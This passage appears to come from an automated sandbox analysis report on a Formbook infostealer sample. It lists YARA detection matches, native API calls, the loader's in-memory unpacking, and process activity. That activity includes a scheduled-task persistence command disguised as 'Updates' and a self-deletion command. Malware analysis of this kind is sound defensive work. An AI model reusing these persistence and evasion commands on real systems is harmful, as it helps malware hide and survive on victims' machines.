          Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: tgamf4XuLa.exe, Forms/mainForm.csLong String: Length: 38272
          Source: HpnpObXJP.exe.0.dr, Forms/mainForm.csLong String: Length: 38272
          Source: 0.0.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: 0.2.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: 6.2.tgamf4XuLa.exe.860000.1.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: 6.0.tgamf4XuLa.exe.860000.0.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: tgamf4XuLa.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 0_2_0288C1240_2_0288C124
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 0_2_0288E5610_2_0288E561
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 0_2_0288E5700_2_0288E570
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041B9C86_2_0041B9C8
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041C2726_2_0041C272
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_00408C5C6_2_00408C5C
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_00408C606_2_00408C60
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041B4A36_2_0041B4A3
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_00402D876_2_00402D87
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508F90020_2_0508F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05080D2020_2_05080D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050A412020_2_050A4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05151D5520_2_05151D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509D5E020_2_0509D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0514100220_2_05141002
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509841F20_2_0509841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509B09020_2_0509B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BEBB020_2_050BEBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050A6E3020_2_050A6E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EC2FB020_2_02EC2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EC8C6020_2_02EC8C60
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EC8C5C20_2_02EC8C5C
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EC2D8720_2_02EC2D87
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EC2D9020_2_02EC2D90
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0508B150 appears 32 times
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_004181C0 NtCreateFile,6_2_004181C0
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_00418270 NtReadFile,6_2_00418270
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_004182F0 NtClose,6_2_004182F0
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_004183A0 NtAllocateVirtualMemory,6_2_004183A0
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_004181BA NtCreateFile,6_2_004181BA
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041826A NtReadFile,6_2_0041826A
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_004182EA NtClose,6_2_004182EA
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041839A NtAllocateVirtualMemory,6_2_0041839A
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,20_2_050C9910
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9540 NtReadFile,LdrInitializeThunk,20_2_050C9540
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C99A0 NtCreateSection,LdrInitializeThunk,20_2_050C99A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C95D0 NtClose,LdrInitializeThunk,20_2_050C95D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9840 NtDelayExecution,LdrInitializeThunk,20_2_050C9840
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9860 NtQuerySystemInformation,LdrInitializeThunk,20_2_050C9860
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9710 NtQueryInformationToken,LdrInitializeThunk,20_2_050C9710
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9780 NtMapViewOfSection,LdrInitializeThunk,20_2_050C9780
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9FE0 NtCreateMutant,LdrInitializeThunk,20_2_050C9FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9650 NtQueryValueKey,LdrInitializeThunk,20_2_050C9650
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9A50 NtCreateFile,LdrInitializeThunk,20_2_050C9A50
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9660 NtAllocateVirtualMemory,LdrInitializeThunk,20_2_050C9660
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C96D0 NtCreateKey,LdrInitializeThunk,20_2_050C96D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C96E0 NtFreeVirtualMemory,LdrInitializeThunk,20_2_050C96E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9520 NtWaitForSingleObject,20_2_050C9520
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050CAD30 NtSetContextThread,20_2_050CAD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9950 NtQueueApcThread,20_2_050C9950
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9560 NtWriteFile,20_2_050C9560
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C99D0 NtCreateProcessEx,20_2_050C99D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C95F0 NtQueryInformationFile,20_2_050C95F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9820 NtEnumerateKey,20_2_050C9820
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050CB040 NtSuspendThread,20_2_050CB040
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C98A0 NtWriteVirtualMemory,20_2_050C98A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C98F0 NtReadVirtualMemory,20_2_050C98F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9B00 NtSetValueKey,20_2_050C9B00
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050CA710 NtOpenProcessToken,20_2_050CA710
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9730 NtQueryVirtualMemory,20_2_050C9730
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9760 NtOpenProcess,20_2_050C9760
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9770 NtSetInformationFile,20_2_050C9770
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050CA770 NtOpenThread,20_2_050CA770
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C97A0 NtUnmapViewOfSection,20_2_050C97A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050CA3B0 NtGetContextThread,20_2_050CA3B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9A00 NtProtectVirtualMemory,20_2_050C9A00
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9610 NtEnumerateValueKey,20_2_050C9610
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9A10 NtQuerySection,20_2_050C9A10
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9A20 NtResumeThread,20_2_050C9A20
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9670 NtQueryInformationProcess,20_2_050C9670
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9A80 NtOpenDirectoryObject,20_2_050C9A80
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED82F0 NtClose,20_2_02ED82F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED8270 NtReadFile,20_2_02ED8270
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED83A0 NtAllocateVirtualMemory,20_2_02ED83A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED81C0 NtCreateFile,20_2_02ED81C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED82EA NtClose,20_2_02ED82EA
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED826A NtReadFile,20_2_02ED826A
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED839A NtAllocateVirtualMemory,20_2_02ED839A
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED81BA NtCreateFile,20_2_02ED81BA
          Source: tgamf4XuLa.exeBinary or memory string: OriginalFilename vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000000.00000000.224546803.00000000006A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFormatt.exe4 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000000.00000002.236927169.00000000029DB000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEnvoySinks.dll6 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exeBinary or memory string: OriginalFilename vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000006.00000002.339403773.0000000000862000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFormatt.exe4 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000006.00000002.343404055.0000000001385000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000006.00000002.343854917.000000000169F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exeBinary or memory string: OriginalFilenameFormatt.exe4 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: HpnpObXJP.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeFile read: C:\Users\user\Desktop\tgamf4XuLa.exeJump to behavior
          Source: tgamf4XuLa.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\tgamf4XuLa.exe 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess created: C:\Users\user\Desktop\tgamf4XuLa.exe C:\Users\user\Desktop\tgamf4XuLa.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess created: C:\Users\user\Desktop\tgamf4XuLa.exe C:\Users\user\Desktop\tgamf4XuLa.exeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'Jump to behavior
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeFile created: C:\Users\user\AppData\Roaming\HpnpObXJP.exeJump to behavior
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeFile created: C:\Users\user\AppData\Local\Temp\tmpEC5E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@10/7
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4704:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01
          Source: tgamf4XuLa.exe, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: HpnpObXJP.exe.0.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.0.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.2.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 6.2.tgamf4XuLa.exe.860000.1.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 6.0.tgamf4XuLa.exe.860000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: tgamf4XuLa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: tgamf4XuLa.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: tgamf4XuLa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: control.pdb source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe, 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe
          Source: Binary string: control.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: tgamf4XuLa.exe, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: HpnpObXJP.exe.0.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.tgamf4XuLa.exe.860000.1.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.tgamf4XuLa.exe.860000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041B3B5 push eax; ret 6_2_0041B408
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041B46C push eax; ret 6_2_0041B472
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041B402 push eax; ret 6_2_0041B408
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041B40B push eax; ret 6_2_0041B472
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050DD0D1 push ecx; ret 20_2_050DD0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EDBA79 push 67258780h; ret 20_2_02EDBA7E
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EDB3B5 push eax; ret 20_2_02EDB408
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EC0008 push edx; retf 20_2_02EC0009
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EDC16B pushad ; ret 20_2_02EDC171
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EDB46C push eax; ret 20_2_02EDB472
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EDB40B push eax; ret 20_2_02EDB472
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EDB402 push eax; ret 20_2_02EDB408
          Source: tgamf4XuLa.exeStatic PE information: 0x960770CE [Tue Oct 5 18:07:10 2049 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.16093944862
          Source: initial sampleStatic PE information: section name: .text entropy: 7.16093944862